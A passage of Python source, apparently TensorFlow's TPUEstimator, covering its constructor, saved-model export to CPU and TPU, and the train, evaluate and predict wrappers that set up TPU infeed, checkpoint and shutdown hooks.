```
In V2, `export_saved_model()` sets up `params['use_tpu']` flag to let the user
know if the code is exporting to TPU (or not). When `params['use_tpu']` is
`True`, users need to call `tpu.rewrite()`, `TPUPartitionedCallOp` and/or
`batch_function()`.
TIP: V2 is recommended as it is more flexible (eg: batching, etc).
"""
def __init__(self,
model_fn=None,
model_dir=None,
config=None,
params=None,
use_tpu=True,
train_batch_size=None,
eval_batch_size=None,
predict_batch_size=None,
batch_axis=None,
eval_on_tpu=True,
export_to_tpu=True,
export_to_cpu=True,
warm_start_from=None,
embedding_config_spec=None,
export_saved_model_api_version=ExportSavedModelApiVersion.V1):
"""Constructs an `TPUEstimator` instance.
Args:
model_fn: Model function as required by `Estimator` which returns
EstimatorSpec or TPUEstimatorSpec. `training_hooks`, 'evaluation_hooks',
and `prediction_hooks` must not capure any TPU Tensor inside the
model_fn.
model_dir: Directory to save model parameters, graph and etc. This can
also be used to load checkpoints from the directory into a estimator to
continue training a previously saved model. If `None`, the model_dir in
`config` will be used if set. If both are set, they must be same. If
both are `None`, a temporary directory will be used.
config: An `tpu_config.RunConfig` configuration object. Cannot be `None`.
params: An optional `dict` of hyper parameters that will be passed into
`input_fn` and `model_fn`. Keys are names of parameters, values are
basic python types. There are reserved keys for `TPUEstimator`,
including 'batch_size'.
use_tpu: A bool indicating whether TPU support is enabled. Currently, -
TPU training and evaluation respect this bit, but eval_on_tpu can
override execution of eval. See below.
train_batch_size: An int representing the global training batch size.
TPUEstimator transforms this global batch size to a per-shard batch
size, as params['batch_size'], when calling `input_fn` and `model_fn`.
Cannot be `None` if `use_tpu` is `True`. Must be divisible by total
number of replicas.
eval_batch_size: An int representing evaluation batch size. Must be
divisible by total number of replicas.
predict_batch_size: An int representing the prediction batch size. Must be
divisible by total number of replicas.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards. For example, if your input_fn produced (images, labels)
where the images tensor is in `HWCN` format, your shard dimensions would
be [3, 0], where 3 corresponds to the `N` dimension of your images
Tensor, and 0 corresponds to the dimension along which to split the
labels to match up with the corresponding images. If None is supplied,
and per_host_input_for_training is True, batches will be sharded based
on the major dimension. If tpu_config.per_host_input_for_training is
False or `PER_HOST_V2`, batch_axis is ignored.
eval_on_tpu: If False, evaluation runs on CPU or GPU. In this case, the
model_fn must return `EstimatorSpec` when called with `mode` as `EVAL`.
export_to_tpu: If True, `export_saved_model()` exports a metagraph for
serving on TPU. Note that unsupported export modes such as EVAL will be
ignored. For those modes, only a CPU model will be exported. Currently,
export_to_tpu only supports PREDICT.
export_to_cpu: If True, `export_saved_model()` exports a metagraph for
serving on CPU.
warm_start_from: Optional string filepath to a checkpoint or SavedModel to
warm-start from, or a `tf.estimator.WarmStartSettings` object to fully
configure warm-starting. If the string filepath is provided instead of
a `WarmStartSettings`, then all variables are warm-started, and it is
assumed that vocabularies and Tensor names are unchanged.
embedding_config_spec: Optional EmbeddingConfigSpec instance to support
using TPU embedding.
export_saved_model_api_version: an integer: 1 or 2. 1 corresponds to V1,
2 corresponds to V2. (Defaults to V1). With
V1, `export_saved_model()` adds rewrite() and TPUPartitionedCallOp() for
user; while in v2, user is expected to add rewrite(),
TPUPartitionedCallOp() etc in their model_fn.
Raises:
ValueError: `params` has reserved keys already.
"""
if config is None or not isinstance(config, tpu_config.RunConfig):
raise ValueError(
'`config` must be provided with type `tpu_config.RunConfig`')
if params is not None and any(k in params for k in _RESERVED_PARAMS_KEYS):
raise ValueError('{} are reserved keys but existed in params {}.'.format(
_RESERVED_PARAMS_KEYS, params))
if use_tpu:
# Perform some very basic validations. More validations will be found in
# _InternalTPUContext.
if train_batch_size is None:
raise ValueError('`train_batch_size` cannot be `None`')
util_lib.check_positive_integer(train_batch_size, 'train_batch_size')
if (config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.PER_SHARD_V1 and
config.tpu_config.num_cores_per_replica):
raise ValueError(
'Model parallelism only supports per host input for training. '
'Please adjust TPURunconfig.per_host_input_for_training.')
if eval_batch_size is not None:
util_lib.check_positive_integer(eval_batch_size, 'eval_batch_size')
if predict_batch_size is not None:
util_lib.check_positive_integer(predict_batch_size,
'predict_batch_size')
if embedding_config_spec:
if (config.tpu_config.per_host_input_for_training not in (
tpu_config.InputPipelineConfig.PER_HOST_V1,
tpu_config.InputPipelineConfig.PER_HOST_V2)):
raise ValueError('Only PER_HOST_V1 and PER_HOST_V2 is supported when '
'using TPU Embedding; got {}.'.format(
config.tpu_config.per_host_input_for_training))
self._embedding_from_feature_columns = (
embedding_config_spec.feature_columns is not None)
if (not (use_tpu and eval_on_tpu) and embedding_config_spec and
embedding_config_spec.partition_strategy == 'mod'):
raise ValueError('Mod sharding of embedding tables not supported on '
'CPU.')
_tpu_estimator_gauge.get_cell().set(True)
# Verifies the model_fn signature according to Estimator framework.
estimator_lib._verify_model_fn_args(model_fn, params) # pylint: disable=protected-access
# We cannot store config and params in this constructor as parent
# constructor might change them, such as assigning a temp dir for
# config.model_dir.
model_function = self._augment_model_fn(model_fn, batch_axis)
# Overwrite log_step_count_steps to disable TensorLoggingHook and
# StepCounterHook from being created in Estimator. TPUEstimator already
# added equivalent hooks in _augment_model_fn above.
self._log_every_n_steps = config.log_step_count_steps
config = config.replace(log_step_count_steps=None)
# Passing non-None params as wrapped model_fn has it.
params = params or {}
super(TPUEstimator, self).__init__(
model_fn=model_function,
model_dir=model_dir,
config=config,
params=params,
warm_start_from=warm_start_from)
self._iterations_per_training_loop = util_lib.parse_iterations_per_loop(
self._config.tpu_config.iterations_per_loop)
# In absence of an explicit `log_every_n_secs` config, if the
# `iterations_per_loop` value is specified as time in seconds, enable
# logging every n secs based on the `iterations_per_loop` value. A trade-off
# avoiding API change on the current release.
# TODO(henrytan): add `log_every_n_secs` to RunConfig.
if self._iterations_per_training_loop.unit == 'seconds':
self._log_every_n_secs = self._iterations_per_training_loop.value
self._log_every_n_steps = None
elif self._iterations_per_training_loop.unit == 'count':
if self._log_every_n_steps is not None:
# Each session.run() lasts for iterations_per_loop. We can't log
# in-between a session.run(), and we can only log after the
# `iterations_per_loop` steps, so we can only approximate. If a user
# requests to log every N steps, we actually want to roughly log every
# N / `iterations_per_loop` steps to match the original intention.
self._log_every_n_steps = (
int(
math.ceil(
float(self._log_every_n_steps) /
self._iterations_per_training_loop.value)))
self._log_every_n_secs = None
else:
assert False, ('Invalid TPUConfig `iterations_per_loop` value. '
'Indicates a bug in `iterations_per_loop` '
'parsing.')
# All properties passed to _InternalTPUContext are immutable.
# pylint: disable=protected-access
self._ctx = tpu_context._get_tpu_context(self._config, train_batch_size,
eval_batch_size,
predict_batch_size, use_tpu,
eval_on_tpu, embedding_config_spec)
self._export_to_cpu = export_to_cpu
self._export_to_tpu = export_to_tpu
if not (isinstance(export_saved_model_api_version,
ExportSavedModelApiVersion)
or export_saved_model_api_version == 1
or export_saved_model_api_version == 2):
raise ValueError('export_saved_model_api_version should be 1 or 2; '
'got {}.'.format(
export_saved_model_api_version))
self._export_saved_model_api_version = export_saved_model_api_version
self._is_input_fn_invoked = None
self._rendezvous = {}
def _add_meta_graph_for_mode(self,
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables=True,
mode=model_fn_lib.ModeKeys.PREDICT,
export_tags=None,
check_variables=True,
strip_default_attrs=True):
if self._export_to_tpu and mode != model_fn_lib.ModeKeys.PREDICT:
tf.compat.v1.logging.warn(
'TPUEstimator only handles mode PREDICT for exporting '
'when `export_to_tpu` is `True`; Mode {} will be ignored '
'for TPU.'.format(mode))
if not self._export_to_cpu and not self._export_to_tpu:
raise ValueError('One of export_to_cpu and export_to_tpu must be true.')
if self._export_to_cpu:
(super(TPUEstimator, self)._add_meta_graph_for_mode(
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables,
mode=mode,
export_tags=export_tags,
check_variables=check_variables,
strip_default_attrs=strip_default_attrs))
if self._export_to_tpu and mode == model_fn_lib.ModeKeys.PREDICT:
input_receiver_fn_map = {
_INFERENCE_ON_TPU_MODE: input_receiver_fn_map[mode]
}
export_tags = [tf.saved_model.SERVING, tf.saved_model.TPU]
mode = _INFERENCE_ON_TPU_MODE
# See b/110052256 for why `check_variables` is `False`.
if not self._export_to_cpu:
check_variables = save_variables = True
else:
check_variables = save_variables = False
(super(TPUEstimator, self)._add_meta_graph_for_mode(
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables=save_variables,
mode=mode,
export_tags=export_tags,
check_variables=check_variables,
strip_default_attrs=strip_default_attrs))
def _call_model_fn(self, features, labels, mode, config):
if mode == _INFERENCE_ON_TPU_MODE:
context = tpu._TPUInferenceContext('tpu_inference', check_ops=False)
try:
context.Enter()
if (
(self._export_saved_model_api_version ==
ExportSavedModelApiVersion.V1)
or self._export_saved_model_api_version == 1):
result = self._call_model_fn_for_inference(features, labels, mode,
config)
else:
result = super(TPUEstimator,
self)._call_model_fn(features, labels, mode, config)
finally:
context.Exit()
return result
else:
return super(TPUEstimator, self)._call_model_fn(features, labels, mode,
config)
def _call_model_fn_for_inference(self, features, labels, mode, config):
"""Wraps `_call_model_fn` for `export_saved_model`."""
if mode != _INFERENCE_ON_TPU_MODE:
raise ValueError('mode must be {}; '
'got {}.'.format(_INFERENCE_ON_TPU_MODE, mode))
return model_fn_inference_on_tpu(
self._model_fn,
features,
labels,
config,
self._params,
batch_config=None)
def _create_global_step(self, graph):
"""Creates a global step suitable for TPUs.
Args:
graph: The graph in which to create the global step.
Returns:
A global step `Tensor`.
Raises:
ValueError: if the global step tensor is already defined.
"""
return _create_global_step(graph)
def _convert_train_steps_to_hooks(self, steps, max_steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.TRAIN) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator,
self)._convert_train_steps_to_hooks(steps, max_steps)
# On TPU.
if steps is None and max_steps is None:
raise ValueError(
'For TPU training, one of `steps` or `max_steps` must be set. '
'Cannot be both `None`.')
# Estimator.train has explicit positiveness check.
if steps is not None:
util_lib.check_positive_integer(steps, 'Train steps')
if max_steps is not None:
util_lib.check_positive_integer(max_steps, 'Train max_steps')
return [
_TPUStopAtStepHook(self._iterations_per_training_loop, steps, max_steps)
]
def _convert_eval_steps_to_hooks(self, steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.EVAL) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_eval_steps_to_hooks(steps)
if steps is None:
raise ValueError('Evaluate `steps` must be set on TPU. Cannot be `None`.')
util_lib.check_positive_integer(steps, 'Eval steps')
return [
evaluation._StopAfterNEvalsHook( # pylint: disable=protected-access
num_evals=steps),
_SetEvalIterationsHook(steps)
]
def _call_input_fn(self, input_fn, mode, input_context=None):
"""Calls the input function.
Args:
input_fn: The input function.
mode: ModeKeys
input_context: Optional instance of `tf.distribute.InputContext`.
Returns:
In TPU mode, returns an input_fn to be called later in model_fn.
Otherwise, calls the input_fn and returns either fatures or
(features, labels).
Raises:
ValueError: if input_fn takes invalid arguments or does not have `params`.
"""
input_fn_args = function_utils.fn_args(input_fn)
config = self.config # a deep copy.
kwargs = {}
if 'params' in input_fn_args:
kwargs['params'] = self.params # a deep copy.
else:
raise ValueError('input_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params["batch_size"]'.format(input_fn))
if 'config' in input_fn_args:
kwargs['config'] = config
if 'mode' in input_fn_args:
kwargs['mode'] = mode
if 'input_context' in input_fn_args:
kwargs['input_context'] = input_context
# Records the fact input_fn has been invoked.
self._is_input_fn_invoked = True
with self._ctx.with_mode(mode) as ctx:
if (ctx.is_running_on_cpu() and
ctx.is_input_slice_broadcast_to_all_cores()):
raise ValueError('Invalid TPUConfig `eval_training_input_configuration`'
' value. SLICED mode only works on use_tpu = True.')
# Setting the batch size in params first. This helps user to have same
# input_fn for use_tpu=True/False.
batch_size_for_input_fn = ctx.batch_size_for_input_fn
if batch_size_for_input_fn is not None:
_add_item_to_params(kwargs['params'], _BATCH_SIZE_KEY,
batch_size_for_input_fn)
# For export_saved_model, input_fn is never passed to Estimator. So,
# `is_export_mode` must be False.
if ctx.is_running_on_cpu(is_export_mode=False):
with tf.compat.v1.device('/device:CPU:0'):
return input_fn(**kwargs)
# For TPU computation, input_fn should be invoked in a tf.while_loop for
# performance. While constructing the tf.while_loop, the structure of
# inputs returned by the `input_fn` needs to be recorded. The structure
# includes whether features or labels is dict or single Tensor, dict keys,
# tensor shapes, and dtypes. The recorded structure is used to create the
# infeed dequeue ops, which must be wrapped and passed as a Fn, called
# inside the TPU computation, as the TPU computation is wrapped inside a
# tf.while_loop also. So, we either pass input_fn to model_fn or pass
# dequeue_fn to model_fn. Here, `input_fn` is passed directly as
# `features` in `model_fn` signature.
def _input_fn(ctx):
_add_item_to_params(kwargs['params'], _CTX_KEY, ctx)
return input_fn(**kwargs)
return _input_fn
def _validate_features_in_predict_input(self, result):
"""Skip the validation.
For TPUEstimator, we do not need to check the result type. `_InputPipeline`
has stronger check. Parent class's check generates confusing warning msg.
Args:
result: `features` returned by input_fn.
"""
pass
def train(self,
input_fn,
hooks=None,
steps=None,
max_steps=None,
saving_listeners=None):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.TRAIN] = rendezvous
try:
return super(TPUEstimator, self).train(
input_fn=input_fn,
hooks=hooks,
steps=steps,
max_steps=max_steps,
saving_listeners=saving_listeners)
except Exception: # pylint: disable=broad-except
rendezvous.record_error('training_loop', sys.exc_info())
finally:
rendezvous.record_done('training_loop')
rendezvous.raise_errors()
def evaluate(self,
input_fn,
steps=None,
hooks=None,
checkpoint_path=None,
name=None):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.EVAL] = rendezvous
try:
return super(TPUEstimator, self).evaluate(
input_fn,
steps=steps,
hooks=hooks,
checkpoint_path=checkpoint_path,
name=name)
except Exception: # pylint: disable=broad-except
rendezvous.record_error('evaluation_loop', sys.exc_info())
finally:
rendezvous.record_done('evaluation_loop')
rendezvous.raise_errors()
def predict(self,
input_fn,
predict_keys=None,
hooks=None,
checkpoint_path=None,
yield_single_examples=True):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.PREDICT] = rendezvous
try:
for result in super(TPUEstimator, self).predict(
input_fn=input_fn,
predict_keys=predict_keys,
hooks=hooks,
checkpoint_path=checkpoint_path,
yield_single_examples=yield_single_examples):
yield result
except Exception: # pylint: disable=broad-except
rendezvous.record_error('prediction_loop', sys.exc_info())
finally:
rendezvous.record_done('prediction_loop')
rendezvous.raise_errors()
rendezvous.record_done('prediction_loop')
rendezvous.raise_errors()
def _augment_model_fn(self, model_fn, batch_axis):
"""Returns a new model_fn, which wraps the TPU support."""
def _model_fn(features, labels, mode, config, params):
"""A Estimator `model_fn` for TPUEstimator."""
# `input_fn` is called in `train()`, `evaluate()`, and `predict()`,
# but not in `export_saved_model()`.
if self._is_input_fn_invoked:
is_export_mode = False
else:
is_export_mode = True
# Clear the bit.
self._is_input_fn_invoked = None
if is_export_mode:
if mode == _INFERENCE_ON_TPU_MODE:
_add_item_to_params(params, _USE_TPU_KEY, True)
mode = model_fn_lib.ModeKeys.PREDICT
else:
_add_item_to_params(params, _USE_TPU_KEY, False)
with self._ctx.with_mode(mode) as ctx:
model_fn_wrapper = _ModelFnWrapper(model_fn, config, params, ctx)
# examples_hook is added to training_hooks for both CPU and TPU
# execution.
if (self._log_every_n_steps is not None or
self._log_every_n_secs is not None):
examples_hook = ExamplesPerSecondHook(
ctx.global_batch_size,
# pylint:disable=g-long-ternary
output_dir=(self.model_dir
if not config or config.save_summary_steps else None),
# pylint:enable=g-long-ternary
every_n_steps=self._log_every_n_steps,
every_n_secs=self._log_every_n_secs)
if ctx.is_running_on_cpu(is_export_mode=is_export_mode):
tf.compat.v1.logging.info('Running %s on CPU/GPU', mode)
estimator_spec = model_fn_wrapper.call_without_tpu(
features, labels, is_export_mode=is_export_mode)
if (self._log_every_n_steps is not None or
self._log_every_n_secs is not None):
estimator_spec = estimator_spec._replace(
training_hooks=estimator_spec.training_hooks + (examples_hook,))
return estimator_spec
assert labels is None, '`labels` passed to `model_fn` must be `None`.'
# TPUEstimator._call_input_fn passes `input_fn` as features to here.
assert callable(features), '`input_fn` is not callable.'
input_fn = features
tpu_init_ops = []
if ctx.embedding_config and mode == model_fn_lib.ModeKeys.TRAIN:
dummy_table_variables, dummy_table_variables_init = (
tpu_embedding_gradient.create_dummy_table_variables(
ctx.embedding_config.tpu_embedding))
ctx.embedding_config.dummy_table_variables = dummy_table_variables
tpu_init_ops.append(dummy_table_variables_init)
input_holders = _InputPipeline(input_fn, batch_axis, ctx)
enqueue_ops, dequeue_fn, input_hooks, run_infeed_loop_on_coordinator = (
input_holders.generate_infeed_enqueue_ops_and_dequeue_fn())
graph = tf.compat.v1.get_default_graph()
for enqueue_op in enqueue_ops:
if isinstance(enqueue_op, list):
graph.get_collection_ref(_TPU_ENQUEUE_OPS).extend(enqueue_op)
else:
graph.add_to_collection(_TPU_ENQUEUE_OPS, enqueue_op)
if mode == model_fn_lib.ModeKeys.TRAIN:
compile_op, loss, host_call, scaffold_fn, training_hooks = (
_train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
has_saver_hook = training_hooks and any(
isinstance(hook, tf.compat.v1.train.CheckpointSaverHook)
for hook in training_hooks)
if ctx.embedding_config:
g = tf.compat.v1.get_default_graph()
table_to_config_dict = (
ctx.embedding_config.tpu_embedding.table_to_config_dict)
optimization_parameters = (
ctx.embedding_config.tpu_embedding.optimization_parameters)
if self._embedding_from_feature_columns:
embedding_variable_name_by_table, slot_variable_names_by_table = (
_tpu_estimator_embedding.get_full_variable_names(
g, table_to_config_dict, optimization_parameters))
else:
embedding_variable_name_by_table = None
slot_variable_names_by_table = None
embedding_variables_and_ops = (
ctx.embedding_config.tpu_embedding.create_variables_and_ops(
embedding_variable_name_by_table,
slot_variable_names_by_table))
tpu_init_ops.extend(embedding_variables_and_ops.load_ops())
# scaffold_fn must be called after variables for TPU embedding has
# been created on CPU, as user might reinitialize those from some
# checkpoint within scaffold_fn.
scaffold = _get_scaffold(scaffold_fn)
host_ops = host_call.create_tpu_hostcall()
shutdown_hooks = []
shutdown_mode = os.environ.get('TF_TPU_GRACEFUL_SHUTDOWN_MODE',
'reset_computation')
if shutdown_mode:
if shutdown_mode == 'shutdown_worker':
finalizer_hooks = [
session_support.ShutdownLameWorkers(),
]
elif shutdown_mode == 'shutdown_all_workers':
finalizer_hooks = [
session_support.ShutdownAllWorkers(),
]
elif shutdown_mode == 'reset_computation':
finalizer_hooks = [
session_support.ResetComputation(),
]
elif not shutdown_mode:
finalizer_hooks = []
else:
raise ValueError('Unknown TF_TPU_GRACEFUL_SHUTDOWN_MODE "%s"' %
shutdown_mode)
if finalizer_hooks:
if has_saver_hook:
saver = _NotSaver(
'No save on shutdown when there are user-defined '
'CheckpointSaverHooks')
else:
saver = None # Yes automatic save on shutdown.
shutdown_hooks.append(
session_support.GracefulShutdownHook(
checkpoint_prefix=self.model_dir + '/model.ckpt',
on_shutdown_hooks=finalizer_hooks,
saver=saver))
with tf.control_dependencies([loss]):
global_step = tf.identity(tf.compat.v1.train.get_global_step())
hooks = input_hooks + shutdown_hooks
if ctx.feed_hook is not None:
tf.compat.v1.logging.info(
'Use user implemented tpu infeed outfeed session hook class.')
infeed_outfeed_session_hook_class = ctx.feed_hook
else:
infeed_outfeed_session_hook_class = TPUInfeedOutfeedSessionHook
hooks.extend([
infeed_outfeed_session_hook_class(
ctx,
enqueue_ops,
host_ops,
tpu_compile_op=compile_op,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator),
rendezvous=self._rendezvous[mode],
master=self._config.master,
session_config=self._session_config,
tpu_init_ops=tpu_init_ops,
outfeed_every_n_steps=self._config.tpu_config
.experimental_host_call_every_n_steps),
InstallSignalHandlerHook()
])
if _check_add_preemption_hook(self._config.cluster):
hooks.extend(
[preempted_hook.CloudTPUPreemptedHook(self._config.cluster)])
if (self._log_every_n_steps is not None or
self._log_every_n_secs is not None):
if self._iterations_per_training_loop.unit == 'count':
examples_hook._set_steps_per_run( # pylint: disable=protected-access
self._iterations_per_training_loop.value)
hooks.append(
tf.compat.v1.train.LoggingTensorHook(
{
'loss': tf.identity(loss),
'step': global_step,
},
every_n_iter=self._log_every_n_steps,
every_n_secs=self._log_every_n_secs))
hooks.append(examples_hook)
if training_hooks:
hooks.extend(training_hooks)
chief_hooks = []
if (not has_saver_hook and
(self._config.save_checkpoints_secs or
self._config.save_checkpoints_steps)):
checkpoint_hook = tf.compat.v1.train.CheckpointSaverHook(
self.model_dir,
save_secs=self._config.save_checkpoints_secs,
save_steps=self._config.save_checkpoints_steps,
scaffold=scaffold,
save_graph_def=self._config.checkpoint_save_graph_def)
if self._iterations_per_training_loop.unit == 'count':
checkpoint_hook._set_steps_per_run( # pylint: disable=protected-access
self._iterations_per_training_loop.value)
else:
# When estimating iterations_per_loop, set steps_per_run to an
# arbitrarily high number to force checking the global step on
# every call.
# TODO(henrytan): refactor SecondOrStepTimer to do this more
# explicitly.
checkpoint_hook._set_steps_per_run( # pylint: disable=protected-access
100000)
chief_hooks.append(checkpoint_hook)
else:
tf.compat.v1.logging.info('Bypassing TPUEstimator hook')
tf.compat.v1.summary.scalar(model_fn_lib.LOSS_METRIC_KEY, loss)
with tf.control_dependencies([loss]):
update_ops = _sync_variables_ops(ctx)
if ctx.embedding_config:
update_ops.extend(embedding_variables_and_ops.retrieve_ops())
# Validate the TPU training graph to catch basic errors
_validate_tpu_training_graph(ctx)
train_op = tf.group(*update_ops)
graph.add_to_collection(_TPU_TRAIN_OP, train_op)
return model_fn_lib.EstimatorSpec(
mode,
loss=loss,
training_chief_hooks=chief_hooks,
training_hooks=hooks,
train_op=train_op,
scaffold=scaffold)
if mode == model_fn_lib.ModeKeys.EVAL:
compile_op, total_loss, host_calls, scaffold_fn, eval_hooks = (
_eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
if ctx.embedding_config:
g = tf.compat.v1.get_default_graph()
table_to_config_dict = (
ctx.embedding_config.tpu_embedding.table_to_config_dict)
if self._embedding_from_feature_columns:
embedding_variable_name_by_table, _ = (
_tpu_estimator_embedding.get_full_variable_names(
g, table_to_config_dict))
else:
embedding_variable_name_by_table = None
embedding_variables_and_ops = (
ctx.embedding_config.tpu_embedding.create_variables_and_ops(
embedding_variable_name_by_table))
tpu_init_ops.extend(embedding_variables_and_ops.load_ops())
# scaffold_fn must be called after variables for TPU embedding has
# been created on CPU, as user might reinitialize those from some
# checkpoint within scaffold_fn.
scaffold = _get_scaffold(scaffold_fn)
iterations_per_loop_var = _create_or_get_iterations_per_loop()
mean_loss = tf.compat.v1.div(
total_loss,
tf.cast(iterations_per_loop_var, dtype=total_loss.dtype))
with tf.control_dependencies([mean_loss]):
# After TPU evaluation computation is done (the mean_loss tensor),
# reads all variables back from TPU and updates the eval step
# counter properly
internal_ops_to_run = _sync_variables_ops(ctx)
internal_ops_to_run.append(
_increase_eval_step_op(iterations_per_loop_var))
host_call_ret = host_calls.create_tpu_hostcall()
eval_metric_ops = {}
eval_update_ops = []
eval_metrics = host_call_ret.get('eval_metrics', {})
if eval_metrics:
# Creates a dummy metric update_op for all metrics. Estimator
# expects all metrics in `eval_metric_ops` have update_op and calls
# them one by one. The real metric update_ops are invoked in a
# separated thread. So, here give Estimator the dummy op for all
# metrics.
with tf.control_dependencies(internal_ops_to_run):
dummy_update_op = tf.no_op()
for k, v in eval_metrics.items():
eval_metric_ops[k] = (v[0], dummy_update_op)
eval_update_ops.append(v[1])
else:
# If no eval metrics are passed, create an identity node for the
# loss and add `internal_ops_to_run` to its dependencies. So
# `internal_ops_to_run` can be executed.
with tf.control_dependencies(internal_ops_to_run):
mean_loss = tf.identity(mean_loss)
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
hooks = [
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
eval_update_ops + host_ops,
tpu_compile_op=compile_op,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator),
rendezvous=self._rendezvous[mode],
master=self._config.evaluation_master,
session_config=self._session_config,
tpu_init_ops=tpu_init_ops)
] + input_hooks
if _check_add_preemption_hook(self._config.cluster):
hooks.extend(
[preempted_hook.CloudTPUPreemptedHook(self._config.cluster)])
if eval_hooks:
hooks.extend(eval_hooks)
return model_fn_lib.EstimatorSpec(
mode,
loss=mean_loss,
evaluation_hooks=hooks,
eval_metric_ops=eval_metric_ops,
scaffold=scaffold)
# Predict
assert mode == model_fn_lib.ModeKeys.PREDICT
(compile_op, dummy_predict_op, host_calls, scaffold_fn,
prediction_hooks) = _predict_on_tpu_system(ctx, model_fn_wrapper,
dequeue_fn)
scaffold = _get_scaffold(scaffold_fn)
with tf.control_dependencies([dummy_predict_op]):
internal_ops_to_run = _sync_variables_ops(ctx)
with tf.control_dependencies(internal_ops_to_run):
dummy_predict_op = tf.no_op()
# In train and evaluation, the main TPU program is passed to monitored
# training session to run. Infeed enqueue and outfeed dequeue are
# executed in side threads. This is not the configuration for
# prediction mode.
#
# For prediction, the Estimator executes the EstimatorSpec.predictions
# directly and yield the element (via generator) to call site. So, the
# outfeed based prediction must be passed to MonitoredSession directly.
# Other parts of the TPU execution are organized as follows.
#
# 1. All outfeed based Tensors must be grouped with predictions Tensors
# to form a single invocation. This avoid the issue we might trigger
# multiple outfeeds incorrectly. To achieve this, `host_call` is
# placed in control_dependencies of `stopping_signals`, and
# `stopping_signals` is passed into _StoppingPredictHook, which sets
# the `stopping_signals` as SessionRunArgs. MonitoredSession merges
# all SessionRunArgs with the fetch in session.run together.
#
# 2. The TPU program (dummy_predict_op) and enqueue_ops (infeed Enqueue)
# are grouped together. They will be launched once and only once in
# side threads and they quit naturally according to the SAME stopping
# condition.
enqueue_ops.append(dummy_predict_op)
host_call_ret = host_calls.create_tpu_hostcall()
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
predictions = host_call_ret['predictions']
_verify_cross_hosts_transfer_size(
predictions,
message=(
'The estimated size for TPUEstimatorSpec.predictions is too '
'large.'))
signals = host_call_ret['signals']
with tf.control_dependencies(host_ops):
host_ops = [] # Empty, we do do not need it anymore.
scalar_stopping_signal = _StopSignals.as_scalar_stopping_signal(
signals)
predictions = _PaddingSignals.slice_tensor_or_dict(
predictions, signals)
hooks = [
_StoppingPredictHook(scalar_stopping_signal),
TPUInfeedOutfeedSessionHookForPrediction(
ctx,
enqueue_ops,
host_ops,
rendezvous=self._rendezvous[mode],
tpu_compile_op=compile_op,
master=self._config.master,
session_config=self._session_config),
] + input_hooks
if prediction_hooks:
hooks.extend(prediction_hooks)
return model_fn_lib.EstimatorSpec(
mode,
prediction_hooks=hooks,
predictions=predictions,
scaffold=scaffold)
return _model_fn
def _check_add_preemption_hook(cluster):
return (tpu_cluster_resolver.is_running_in_gce() and cluster and isinstance(
cluster, tf.distribute.cluster_resolver.TPUClusterResolver) and
cluster._cloud_tpu_client.api_available())
def _export_output_to_tensors(export_output):
"""Get a list of `Tensors` used in `export_output`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
Returns:
a list of tensors used in export_output.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
return [export_output.scores, export_output.classes]
elif isinstance(export_output, export_output_lib.RegressionOutput):
return [export_output.value]
elif isinstance(export_output, export_output_lib.PredictOutput):
return list(export_output.outputs.values())
else:
raise ValueError(
'`export_output` must be have type `ClassificationOutput`, '
'`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
def _clone_export_output_with_tensors(export_output, tensors):
"""Clones `export_output` but with new `tensors`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
tensors: a list of `Tensors` used to construct a new `export_output`.
Returns:
A dict similar to `export_output` but with `tensors`.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
if len(tensors) != 2:
raise ValueError('tensors must be of length 2; '
'got {}.'.format(len(tensors)))
return export_output_lib.ClassificationOutput(*tensors)
elif isinstance(export_output, export_output_lib.RegressionOutput):
if len(tensors) != 1:
raise ValueError('tensors must be of length 1; '
'got {}'.format(len(tensors)))
return export_output_lib.RegressionOutput(*tensors)
elif isinstance(export_output, export_output_lib.PredictOutput):
return export_output_lib.PredictOutput(
dict(zip(export_output.outputs.keys(), tensors)))
else:
raise ValueError(
'`export_output` must be have type `ClassificationOutput`, '
'`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
def _eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
(single_tpu_eval_step, host_calls, captured_scaffold_fn, captured_eval_hooks
) = model_fn_wrapper.convert_to_single_tpu_eval_step(dequeue_fn)
@tpu_function.on_device_training_loop
def multi_tpu_eval_steps_on_single_shard(replica_id):
# `tpu.split_compile_and_shard()` splits and passes input for each
# replica as an array. As so, correctly reshape the input to be a
# scalar.
replica_id = tf.reshape(replica_id, [])
with tpu_context._TPUEstimatorReplicaContext(replica_id): # pylint: disable=protected-access
return training_loop.repeat(iterations_per_loop_var, single_tpu_eval_step,
[_ZERO_LOSS])
# Add input that represents id for each replica in sync so that
